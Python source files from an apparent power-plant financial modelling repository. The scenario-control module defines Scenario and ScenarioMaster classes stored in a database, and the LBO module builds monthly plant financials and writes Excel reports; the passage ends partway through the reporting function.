| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,737 | changliukean/KEAN3 | refs/heads/master | /scenario_control/Scenario.py | from database import dbScenarioMaster
from utility import dateUtils
import pandas as pd
from datetime import datetime, date
import sys
class Scenario:
    """Identifies one (module, table, portfolio, scenario, version) record.

    A lightweight value object used as both the output key and the input
    keys of a ScenarioMaster.
    """

    def __init__(self, module, table, portfolio, scenario, version, comment=''):
        self.module = module
        self.table = table
        self.portfolio = portfolio
        self.scenario = scenario
        self.version = version
        # Bug fix: this was hard-coded to '' so the caller-supplied comment
        # was silently discarded (it is read back in __str__ and when a
        # ScenarioMaster saves its input scenarios).
        self.comment = comment

    def print_scenario(self):
        """Print a human-readable dump of this scenario to stdout."""
        print ("---------------------------")
        print ("Scenario object:")
        print ("module:", self.module)
        print ("table:", self.table)
        print ("portfolio: ", self.portfolio)
        print ("scenario:", self.scenario)
        print ("version:", self.version)
        print ("comment:", self.comment)

    def __str__(self):
        """Return the same dump as print_scenario() as one string."""
        console_text = ''
        # Bug fix: the separator line was missing its trailing newline, so it
        # ran into "Scenario object:" (every other line here, and
        # ScenarioMaster.__str__, already end with "\n").
        console_text += ("---------------------------\n")
        console_text += ("Scenario object:\n")
        console_text += ("module:" + self.module + "\n")
        console_text += ("table:" + self.table + "\n")
        console_text += ("portfolio: " + self.portfolio + "\n")
        console_text += ("scenario: " + self.scenario + "\n")
        console_text += ("version: " + self.version + "\n")
        console_text += ("comment: " + self.comment + "\n")
        return console_text
class ScenarioMaster:
    """Wires one output Scenario to its inputs and time grid.

    A ScenarioMaster holds the output Scenario key, the scenario's time
    parameters (start year, number of years, forecast start month,
    valuation date — loaded from the database when not supplied), the
    derived actual/forecast month lists, and the input Scenarios /
    nested input ScenarioMasters loaded from the scenario_master table.
    """

    def __init__(self,
                 outputScenario,
                 startYear=1900,
                 numberOfYears=-1,
                 forecastStartMonth=date(1900,1,1),
                 valuationDate=date(1900,1,1),
                 inputScenarios=None,
                 actualMonths=None,
                 forecastMonths=None,
                 inputScenarioMasters=None):
        # Bug fix: the four list parameters previously defaulted to `=[]`.
        # A mutable default is shared across every instance, so
        # load_sm_fromdb() (which appends to self.inputScenarios /
        # self.inputScenarioMasters) accumulated inputs across ALL
        # ScenarioMaster objects ever created.  `None` sentinels preserve
        # the old call signature while giving each instance fresh lists.
        #
        # a Scenario OBJECT for output, this is a MUST HAVE parameter for
        # initiating a ScenarioMaster instance
        self.outputScenario = outputScenario
        # call a db getter to fill the date time information
        db_start_year, db_number_of_years, db_forecast_start_month, db_valuation_date = self.load_scenario_datetime_fromdb()
        # the first year of the scenario (1900 is the "not supplied" sentinel)
        self.startYear = startYear if startYear != 1900 else db_start_year
        # the month that the forecast starts
        self.forecastStartMonth = forecastStartMonth if forecastStartMonth != date(1900,1,1) else db_forecast_start_month
        # total number of years (-1 is the "not supplied" sentinel)
        self.numberOfYears = numberOfYears if numberOfYears != -1 else db_number_of_years
        # valuation date (if needed)
        self.valuationDate = valuationDate if valuationDate != date(1900,1,1) else db_valuation_date
        # list of months for actual period (derived when not supplied;
        # an explicit empty list is treated as "not supplied", as before)
        self.actualMonths = actualMonths if actualMonths else self.build_actuals_period()
        # list of months for forecast period
        self.forecastMonths = forecastMonths if forecastMonths else self.build_forecast_period()
        # a list of Scenario OBJECTS for input
        self.inputScenarios = inputScenarios if inputScenarios is not None else []
        # a list of ScenarioMaster OBJECTS for input
        self.inputScenarioMasters = inputScenarioMasters if inputScenarioMasters is not None else []

    def load_sm_fromdb(self):
        """Load this master's inputs from the scenario_master table.

        Rows at scenario_level 'scenario' become input Scenario objects;
        rows at 'scenario_master' are loaded recursively into nested
        ScenarioMaster objects.
        """
        raw_scenario_master_df = dbScenarioMaster.get_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
        for index, row in raw_scenario_master_df.iterrows():
            scenario_level = row['scenario_level']
            if scenario_level == 'scenario':
                scenario = Scenario(row['input_module'], row['input_table'], row['portfolio'], row['input_scenario'], row['input_version'], row['comment'])
                self.inputScenarios.append(scenario)
            if scenario_level == 'scenario_master':
                scenario = Scenario(row['input_module'], row['input_table'], row['portfolio'], row['input_scenario'], row['input_version'], row['comment'])
                scenario_master = ScenarioMaster(scenario)
                scenario_master.load_sm_fromdb()
                self.inputScenarioMasters.append(scenario_master)

    def load_scenario_datetime_fromdb(self):
        """Fetch (start_year, number_of_years, forecast_start_month, valuation_date).

        Returns the sentinel tuple (1900, -1, date(1900,1,1), date(1900,1,1))
        when the database has no datetime record for this scenario.
        """
        raw_scenario_master_datetime_df = dbScenarioMaster.get_scenario_master_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
        # raw_scenario_master_datetime_df.to_csv("raw_scenario_master_datetime_df.csv")
        if raw_scenario_master_datetime_df is not None and len(raw_scenario_master_datetime_df) > 0:
            start_year = raw_scenario_master_datetime_df.iloc[0]['start_year']
            number_of_years = raw_scenario_master_datetime_df.iloc[0]['number_of_years']
            forecast_start_month = datetime.strptime(str(raw_scenario_master_datetime_df.iloc[0]['forecast_start_month']), "%Y-%m-%d").date()
            valuation_date = datetime.strptime(str(raw_scenario_master_datetime_df.iloc[0]['valuation_date']), "%Y-%m-%d").date()
            return start_year, number_of_years, forecast_start_month, valuation_date
        else:
            return 1900, -1, date(1900,1,1), date(1900,1,1)

    def build_actuals_period(self):
        """Return the month list from Jan 31 of startYear through the month
        before forecastStartMonth."""
        actuals_end_month = dateUtils.get_one_month_ago(self.forecastStartMonth)
        actuals_begin_month = date(self.startYear, 1, 31)
        actual_months = dateUtils.get_month_list(actuals_begin_month, actuals_end_month)
        return actual_months

    def build_forecast_period(self):
        """Return the month list from forecastStartMonth through Dec 31 of the
        scenario's final year."""
        forecast_end_month = date(self.startYear + self.numberOfYears - 1, 12,31)
        forecast_months = dateUtils.get_month_list(self.forecastStartMonth, forecast_end_month)
        return forecast_months

    def print_scenario_master(self):
        """Print a human-readable dump of this master (recursing into nested
        input masters) to stdout."""
        print ("====================================")
        print ("Scenario Master object: ")
        print ("start year:", self.startYear)
        print ("forecast start month:", self.forecastStartMonth)
        print ("number of years:", self.numberOfYears)
        print ("valuation date:", self.valuationDate)
        print ("actual month list:", self.actualMonths)
        print ("forecast month list:", self.forecastMonths)
        print ("----------------- output scenario: ")
        self.outputScenario.print_scenario()
        print ("input scenarios: ")
        for scenario in self.inputScenarios:
            print (scenario)
        print ("----------------- input scenario masters:")
        for scenario_master in self.inputScenarioMasters:
            scenario_master.print_scenario_master()

    def __str__(self):
        """Return a dump of this master; nested masters are summarized by
        their output scenario only (no recursion)."""
        console_text = ''
        console_text += ("====================================\n")
        console_text += ("Scenario Master object: \n")
        console_text += ("start year:" + str(self.startYear) + "\n")
        console_text += ("forecast start month:" + str(self.forecastStartMonth) + "\n")
        console_text += ("number of years:" + str(self.numberOfYears) + "\n")
        console_text += ("valuation date:" + str(self.valuationDate) + "\n")
        console_text += ("actual month list:" + ",".join([str(item) for item in self.actualMonths]) + "\n")
        console_text += ("forecast month list:" + ",".join([str(item) for item in self.forecastMonths]) + "\n")
        console_text += ("----------------- output scenario: \n")
        console_text += str(self.outputScenario)
        console_text += ("input scenarios: \n")
        for scenario in self.inputScenarios:
            console_text += str(scenario)
        console_text += ("----------------- input scenario masters:\n")
        for scenario_master in self.inputScenarioMasters:
            console_text += str(scenario_master.outputScenario)
        return console_text

    def save(self, force_overwrite=True):
        """Persist this master's datetime info and input rows to the database.

        Returns a 6-character log code string:
          "000000" — saved with no pre-existing record,
          "010003" — pre-existing record overwritten,
          "010002" — record already exists and force_overwrite is False
                      (nothing written).
        """
        # step 1 check if scenario_master has it
        existing_scenario_master_df = dbScenarioMaster.get_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
        """ portfolio, scenario, version, module """
        existing_scenario_datetime_df = dbScenarioMaster.get_scenario_master_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
        log_code = "000000"
        # step 2, remove existing record if force_overwrite
        if (len(existing_scenario_master_df) > 0 or len(existing_scenario_datetime_df) > 0) and force_overwrite:
            dbScenarioMaster.delete_scenario_master(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module, self.outputScenario.table)
            dbScenarioMaster.delete_scenario_datetime(self.outputScenario.portfolio, self.outputScenario.scenario, self.outputScenario.version, self.outputScenario.module)
            log_code = "010003"
        # step 3, if not force_overwrite, return and signal it
        if (len(existing_scenario_master_df)) > 0 and (not force_overwrite):
            log_code = "010002"
            return log_code
        # step 4, insert new records
        # step 4.1, reorganize and insert scenario master time info
        dbScenarioMaster.insert_scenario_datetime(self.outputScenario.module,
                                                  self.outputScenario.portfolio,
                                                  self.outputScenario.scenario,
                                                  self.outputScenario.version,
                                                  self.startYear,
                                                  self.numberOfYears,
                                                  self.forecastStartMonth,
                                                  self.valuationDate)
        # step 4.2, reorganize and insert scenario master input info
        ready_to_kean_sm_list = []
        for input_scenario in self.inputScenarios:
            ready_to_kean_sm_row = []
            ready_to_kean_sm_row.append(self.outputScenario.portfolio)
            ready_to_kean_sm_row.append(self.outputScenario.module)
            ready_to_kean_sm_row.append(self.outputScenario.table)
            ready_to_kean_sm_row.append(self.outputScenario.scenario)
            ready_to_kean_sm_row.append(self.outputScenario.version)
            ready_to_kean_sm_row.append(input_scenario.module)
            ready_to_kean_sm_row.append(input_scenario.table)
            ready_to_kean_sm_row.append(input_scenario.scenario)
            ready_to_kean_sm_row.append(input_scenario.version)
            ready_to_kean_sm_row.append("scenario")
            ready_to_kean_sm_row.append(input_scenario.comment)
            ready_to_kean_sm_list.append(ready_to_kean_sm_row)
        for input_scenario_master in self.inputScenarioMasters:
            ready_to_kean_sm_row = []
            ready_to_kean_sm_row.append(self.outputScenario.portfolio)
            ready_to_kean_sm_row.append(self.outputScenario.module)
            ready_to_kean_sm_row.append(self.outputScenario.table)
            ready_to_kean_sm_row.append(self.outputScenario.scenario)
            ready_to_kean_sm_row.append(self.outputScenario.version)
            ready_to_kean_sm_row.append(input_scenario_master.outputScenario.module)
            ready_to_kean_sm_row.append(input_scenario_master.outputScenario.table)
            ready_to_kean_sm_row.append(input_scenario_master.outputScenario.scenario)
            ready_to_kean_sm_row.append(input_scenario_master.outputScenario.version)
            ready_to_kean_sm_row.append("scenario_master")
            ready_to_kean_sm_row.append(input_scenario_master.outputScenario.comment)
            ready_to_kean_sm_list.append(ready_to_kean_sm_row)
        ready_to_kean_sm_df = pd.DataFrame(data=ready_to_kean_sm_list, columns=['portfolio','output_module','output_table','output_scenario','output_version','input_module','input_table','input_scenario','input_version','scenario_level','comment'])
        dbScenarioMaster.insert_scenario_master(ready_to_kean_sm_df)
        return log_code

    def remove(self):
        # to be implemented
        return
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,738 | changliukean/KEAN3 | refs/heads/master | /lbo/lbo.py | import pandas as pd
import numpy as np
from openpyxl import Workbook
import openpyxl as opx
from openpyxl.utils.dataframe import dataframe_to_rows
from utility.dateUtils import get_month_list
from database.dbPrices import get_historical_lmp
from dateutil.relativedelta import relativedelta
from datetime import date, datetime
import sys
# Sign convention applied before reporting: these expense FSLIs are stored as
# positive magnitudes and are flipped (multiplied by -1) for display.
LBO_FSLI_COLOR = {'Delivered Fuel Expense':-1,'Variable O&M Expense':-1,'Net Emissions Expense':-1}
# FSLIs that are summed when rolling monthly values up to annual figures.
# NOTE: the list order is also the row display order used by the report
# reindex calls, so do not reorder casually.
LBO_SUM_FSLIS = ['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
                'Net Emissions Expense','Gross Energy Margin','Hedges',
                'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
                'Ancillary Revenue','Other Revenue','Gross Margin',
                'FOM','Taxes','Insurance','Fixed Costs',
                'EBITDA','Capex','EBITDA less Capex',
                'Generation', 'Generation - On Peak', 'Generation - Off Peak',
                'Hours - On Peak', 'Hours - Off Peak']
def convert_date(datetimeobj):
    """Normalize *datetimeobj* to a plain ``datetime.date``.

    Accepts either a ``date`` or a ``datetime`` and always returns a
    ``date``.  The ``datetime`` check must run first: ``datetime`` is a
    subclass of ``date``, so the original ``isinstance(obj, date)`` test
    matched datetimes too and returned them unconverted (the ``.date()``
    branch was unreachable).

    Raises:
        TypeError: if the argument is neither a date nor a datetime.
            (The original printed the value and killed the whole process
            with ``sys.exit()``; raising lets callers handle it.)
    """
    if isinstance(datetimeobj, datetime):
        return datetimeobj.date()
    if isinstance(datetimeobj, date):
        return datetimeobj
    raise TypeError("convert_date expects a date or datetime, got %r" % (datetimeobj,))
def build_lbo_financials(powerplant_df, portfolio, scenario, version, dispatch_df, lbo_assumptions_df):
    """Assemble the long-format monthly LBO financials for one scenario/version.

    Combines dispatch-model output rows (energy margin drivers) with the
    per-plant fixed cost/revenue assumptions, derives the margin roll-up
    FSLIs (Gross Energy Margin through EBITDA less Capex), drops months
    after each plant's retirement date, and returns a melted DataFrame with
    columns ['portfolio','scenario','version','entity','fsli','period','value'].

    Args:
        powerplant_df: plant master data; must have 'name' and
            'retirement_date' columns.
        portfolio, scenario, version: identifiers stamped onto every row.
        dispatch_df: dispatch output with company/scenario/version/entity/
            fsli/period/value columns.
        lbo_assumptions_df: assumption rows with entity/fsli/period/value/unit
            columns; only rows with unit == '$' are picked up.
    """
    lbo_financials_df = pd.DataFrame()
    # FSLIs copied straight through from the dispatch output.
    dispatch_financials_fsli_list = ['Generation - On Peak',
                                    'Generation - Off Peak',
                                    'Generation',
                                    'ICAP',
                                    'Capacity Factor',
                                    'Capacity Factor - On Peak',
                                    'Capacity Factor - Off Peak',
                                    'Realized Power Price - Off Peak',
                                    'Realized Power Price - On Peak',
                                    'Realized Fuel Price - Off Peak',
                                    'Realized Fuel Price - On Peak',
                                    'Realized Spread - ATC',
                                    'Realized Spread - Off Peak',
                                    'Realized Spread - On Peak',
                                    'Energy Revenue',
                                    'Delivered Fuel Expense',
                                    'Variable O&M Expense',
                                    'Net Emissions Expense',
                                    'on_hours',
                                    'off_hours']
    lbo_dispatch_df = dispatch_df.loc[dispatch_df.fsli.isin(dispatch_financials_fsli_list)]
    lbo_financials_df = lbo_dispatch_df
    # Plants that actually appear in the dispatch output.
    dispatch_plant_list = list(set(list(lbo_financials_df.entity)))
    """ company, scenario, version, entity, fsli, period, value """
    # Pull each assumption-driven FSLI for every plant in the plant master.
    for fsli in ['Capacity Revenue','FOM','Taxes','Insurance','Fixed Costs','Hedges','Fixed Fuel Transport','Other Revenue','Ancillary Revenue','Capex']:
        for index, row in powerplant_df.iterrows():
            entity = row['name']
            # NOTE(review): 'ICAP' is not in the fsli loop list above, so this
            # branch appears unreachable (dead code) — confirm whether ICAP was
            # meant to be in the loop for plants missing from dispatch output.
            if fsli in ['ICAP']:
                if entity not in dispatch_plant_list:
                    lbo_fsli_entity_assumptions_df = lbo_assumptions_df.loc[(lbo_assumptions_df.entity == entity) & (lbo_assumptions_df.fsli == fsli)]
                    unit = lbo_fsli_entity_assumptions_df.iloc[0]['unit']
                    temp_fsli_df = pd.DataFrame()
                    if unit == '$':
                        temp_fsli_df = lbo_fsli_entity_assumptions_df[['entity', 'fsli', 'period', 'value']]
                        temp_fsli_df['company'] = portfolio
                        temp_fsli_df['scenario'] = scenario
                        temp_fsli_df['version'] = version
                        lbo_financials_df = lbo_financials_df.append(temp_fsli_df)
                continue
            # NOTE(review): iloc[0] raises if a plant has no assumption rows
            # for this fsli — assumes assumptions are complete; confirm.
            lbo_fsli_entity_assumptions_df = lbo_assumptions_df.loc[(lbo_assumptions_df.entity == entity) & (lbo_assumptions_df.fsli == fsli)]
            unit = lbo_fsli_entity_assumptions_df.iloc[0]['unit']
            temp_fsli_df = pd.DataFrame()
            if unit == '$':
                temp_fsli_df = lbo_fsli_entity_assumptions_df[['entity', 'fsli', 'period', 'value']]
                temp_fsli_df['company'] = portfolio
                temp_fsli_df['scenario'] = scenario
                temp_fsli_df['version'] = version
                # NOTE(review): DataFrame.append was removed in pandas 2.0;
                # this file assumes an older pandas — confirm pinned version.
                lbo_financials_df = lbo_financials_df.append(temp_fsli_df)
    # Stamp identifiers and normalize period to datetime.date.
    lbo_financials_df['scenario'] = scenario
    lbo_financials_df['version'] = version
    lbo_financials_df['period'] = lbo_financials_df.apply(lambda row: convert_date(row['period']), axis=1)
    lbo_financials_df = lbo_financials_df[['company','scenario','version','entity','fsli','period','value']]
    # Pivot to one column per FSLI so the margin roll-ups can be computed
    # with vectorized column arithmetic.
    pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['company','scenario','version','entity', 'period'], columns=['fsli'], values='value', aggfunc=np.sum)
    # lbo_financials_df.to_csv("lbo_financials_df.csv")
    pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
    pivot_lbo_financials_df.fillna(0.0, inplace=True)
    # Margin roll-up: expenses are subtracted here, while fixed costs / capex
    # are added below (they are presumably stored sign-flipped — confirm).
    pivot_lbo_financials_df['Gross Energy Margin'] = pivot_lbo_financials_df['Energy Revenue'] - pivot_lbo_financials_df['Delivered Fuel Expense'] - pivot_lbo_financials_df['Variable O&M Expense'] - pivot_lbo_financials_df['Net Emissions Expense']
    pivot_lbo_financials_df['Net Energy Margin'] = pivot_lbo_financials_df['Gross Energy Margin'] + pivot_lbo_financials_df['Hedges']
    pivot_lbo_financials_df['Gross Margin'] = pivot_lbo_financials_df['Net Energy Margin'] + \
                                              pivot_lbo_financials_df['Fixed Fuel Transport'] + \
                                              pivot_lbo_financials_df['Capacity Revenue'] + \
                                              pivot_lbo_financials_df['Ancillary Revenue'] + \
                                              pivot_lbo_financials_df['Other Revenue']
    pivot_lbo_financials_df['EBITDA'] = pivot_lbo_financials_df['Gross Margin'] + \
                                        pivot_lbo_financials_df['Fixed Costs']
    pivot_lbo_financials_df['EBITDA less Capex'] = pivot_lbo_financials_df['EBITDA'] + \
                                                   pivot_lbo_financials_df['Capex']
    # NOTE(review): divides by Generation with no zero guard — months with
    # zero generation yield inf/NaN here; confirm downstream tolerates it.
    pivot_lbo_financials_df['Realized Power Price'] = pivot_lbo_financials_df['Energy Revenue'] / \
                                                      pivot_lbo_financials_df['Generation']
    pivot_lbo_financials_df.rename(columns={'on_hours':'Hours - On Peak', 'off_hours':'Hours - Off Peak'}, inplace=True)
    pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
    pivot_lbo_financials_df = pivot_lbo_financials_df[[item for item in pivot_lbo_financials_df.columns if item != 'index']]
    # Attach each plant's retirement date so post-retirement months can be cut.
    retirement_date_df = powerplant_df[['name','retirement_date']]
    pivot_lbo_financials_df = pd.merge(pivot_lbo_financials_df, retirement_date_df, left_on=['entity'], right_on=['name'], how='left')
    """ if a plant is retired, just drop that row """
    for index, row in pivot_lbo_financials_df.iterrows():
        if row['period'] > row['retirement_date']:
            pivot_lbo_financials_df.drop(index, inplace=True)
    # pivot_lbo_financials_df.to_csv("pivot_lbo_financials_df.csv")
    # Melt back to long format for storage/reporting.
    melted_pivot_lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['company','scenario','version','entity','period'],
                                            value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['company','scenario','version','entity','period']],
                                            var_name='fsli',
                                            value_name='value')
    melted_pivot_lbo_financials_df.rename(columns={'company':'portfolio'}, inplace=True)
    # melted_pivot_lbo_financials_df.to_csv("melted_pivot_lbo_financials_df.csv")
    return melted_pivot_lbo_financials_df
def write_lbo_financials_report_monthly(dest_file_path, lbo_financials_df, portfolio):
    """Write the monthly LBO financials Excel workbook for one portfolio.

    Produces one .xlsx containing a portfolio 'Summary' tab (monthly P&L plus
    capacity rows), an 'AnnualByPlant' tab, an 'AnnualFSLI' tab, and one
    monthly tab per plant.  The file name is built from *portfolio* and the
    scenario/version stamped on *lbo_financials_df*.

    Args:
        dest_file_path: destination directory for the workbook.
        lbo_financials_df: long-format frame with columns
            ['portfolio','scenario','version','entity','fsli','period','value']
            (as produced by build_lbo_financials).
        portfolio: portfolio name, used for tab/row labels and the file name.
    """
    wb = Workbook()
    entity_list = list(sorted(list(set(list(lbo_financials_df['entity'])))))
    # step 1, apply lbo color for sinage
    pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['portfolio','scenario','version','entity','period'], columns=['fsli'], values='value', aggfunc=np.sum)
    for fsli in LBO_FSLI_COLOR:
        pivot_lbo_financials_df[fsli] = pivot_lbo_financials_df[fsli] * LBO_FSLI_COLOR[fsli]
    pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
    # Melt back to long format now that the sign convention is applied.
    lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['portfolio','scenario','version','entity','period'],
                                value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','period']],
                                var_name='fsli',
                                value_name='value')
    lbo_financials_df = lbo_financials_df.reset_index()
    # Summary tab: monthly P&L rows summed across all plants.
    pnl_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(['Energy Revenue',
                                                                               'Delivered Fuel Expense',
                                                                               'Variable O&M Expense',
                                                                               'Net Emissions Expense',
                                                                               'Gross Energy Margin',
                                                                               'Hedges',
                                                                               'Net Energy Margin',
                                                                               'Fixed Fuel Transport',
                                                                               'Capacity Revenue',
                                                                               'Ancillary Revenue',
                                                                               'Other Revenue',
                                                                               'Gross Margin',
                                                                               'FOM',
                                                                               'Taxes',
                                                                               'Insurance',
                                                                               'Fixed Costs',
                                                                               'EBITDA',
                                                                               'Capex',
                                                                               'EBITDA less Capex'])]
    summary_df = pd.pivot_table(pnl_lbo_financials_df, index=['portfolio','scenario','version','fsli'], columns=['period'], values='value', aggfunc=np.sum)
    summary_df = summary_df.reset_index()
    summary_df = summary_df[[column for column in summary_df.columns if column not in ['portfolio','scenario','version']]]
    summary_df.rename(columns={'fsli': portfolio}, inplace=True)
    summary_df = summary_df.set_index(portfolio)
    # reindex fixes the display row order of the P&L.
    summary_df = summary_df.reindex(['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
                                     'Net Emissions Expense','Gross Energy Margin','Hedges',
                                     'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
                                     'Ancillary Revenue','Other Revenue','Gross Margin',
                                     'FOM','Taxes','Insurance','Fixed Costs',
                                     'EBITDA','Capex','EBITDA less Capex'])
    # Capacity/generation row group appended under the P&L on the Summary tab.
    capacity_row_group_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(['ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak', 'Hours - On Peak', 'Hours - Off Peak'])]
    capacity_row_group_df = pd.pivot_table(capacity_row_group_df, index=['portfolio','scenario','version', 'period'], columns=['fsli'], values='value', aggfunc=np.sum)
    capacity_row_group_df = capacity_row_group_df.reset_index()
    # NOTE(review): assumes 'period' is a month-end date so .day equals the
    # number of days in the month — confirm upstream period convention.
    capacity_row_group_df['Capacity Factor'] = capacity_row_group_df.apply(lambda row: row['Generation'] / (row['ICAP'] * 24 * row['period'].day), axis=1)
    # Hours were summed across plants by the pivot, so divide by the plant
    # count to recover per-plant hours for the capacity-factor denominators.
    capacity_row_group_df['Capacity Factor - On Peak'] = capacity_row_group_df['Generation - On Peak'] / (capacity_row_group_df['ICAP'] * capacity_row_group_df['Hours - On Peak'] / len(entity_list))
    capacity_row_group_df['Capacity Factor - Off Peak'] = capacity_row_group_df['Generation - Off Peak'] / (capacity_row_group_df['ICAP'] * capacity_row_group_df['Hours - Off Peak'] / len(entity_list))
    capacity_row_group_df['Hours - On Peak'] = capacity_row_group_df['Hours - On Peak'] / len(entity_list)
    capacity_row_group_df['Hours - Off Peak'] = capacity_row_group_df['Hours - Off Peak'] / len(entity_list)
    # capacity_row_group_df.rename(columns={'on_hours':'Hours - On Peak','off_hours':"Hours - Off Peak"}, inplace=True)
    capacity_row_group_df = pd.melt(capacity_row_group_df, id_vars=['portfolio','scenario','version','period'],
                                    value_vars=[item for item in list(capacity_row_group_df.columns) if item not in ['portfolio','scenario','version','period']],
                                    var_name='fsli',
                                    value_name='value')
    capacity_row_group_df = pd.pivot_table(capacity_row_group_df, index=['portfolio','scenario','version','fsli'], columns=['period'], values='value', aggfunc=np.sum )
    capacity_row_group_df = capacity_row_group_df.reset_index()
    capacity_row_group_df = capacity_row_group_df[[item for item in capacity_row_group_df.columns if item not in ['portfolio', 'scenario', 'version']]]
    capacity_row_group_df.rename(columns={'fsli':portfolio}, inplace=True)
    capacity_row_group_df = capacity_row_group_df.set_index(portfolio)
    capacity_row_group_df = capacity_row_group_df.reindex(['ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak', 'Hours - On Peak', 'Hours - Off Peak'])
    summary_df = summary_df.append(capacity_row_group_df)
    summary_df.rename(columns={'fsli': portfolio}, inplace=True)
    summary_df = summary_df.reset_index()
    summary_tab = wb.copy_worksheet(wb.active)
    summary_tab.title = 'Summary'
    for r in dataframe_to_rows(summary_df, index=False, header=True):
        summary_tab.append(r)
    # annual consolidated view tab
    annual_consolidated_tab = wb.copy_worksheet(wb.active)
    # Sum-type FSLIs aggregate by year; ICAP averages instead (it is a
    # capacity level, not a flow).
    sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
    sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
    grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).sum()
    grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
    average_fslis = ['ICAP']
    average_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(average_fslis)]
    average_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(average_fslis_lbo_financials_df['period']).year
    grouped_average_fslis_lbo_financials_df = average_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).mean()
    grouped_average_fslis_lbo_financials_df = grouped_average_fslis_lbo_financials_df.reset_index()
    annual_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.append(grouped_average_fslis_lbo_financials_df)
